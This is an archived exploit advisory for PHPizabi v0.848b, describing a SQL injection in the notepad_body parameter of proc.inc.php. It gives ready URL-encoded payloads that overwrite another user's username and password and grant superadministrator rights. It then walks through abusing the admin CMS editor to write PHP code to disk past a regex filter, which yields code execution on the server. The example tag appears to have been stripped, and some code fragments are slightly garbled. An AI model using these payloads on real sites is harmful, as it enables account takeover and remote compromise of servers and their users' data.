AOH :: HP Unsorted P :: VA2963.HTM

PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)



PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)



--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/ 
software site: http://www.phpizabi.net/ 
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

 LoadThis($buffer);
		// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
		if (isset($_GET["notepad_body"])) {
			myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
			me("flush");
		}
..

note urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user% 

2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=% 

20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index 

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file} 

use this opening and closing tag style, example:



(it is always availiable, see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php) 
because of that preg_replace() in /modules/admin/cms/edit.php :

..
	if (isset($_POST["Submit"])) {
		if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {
		=09
			$body 				"\n"
				.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
				."\n";
			;
		=09
			fwrite($handle, $body);
			fclose($handle);
..

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_ 

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs 

..
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.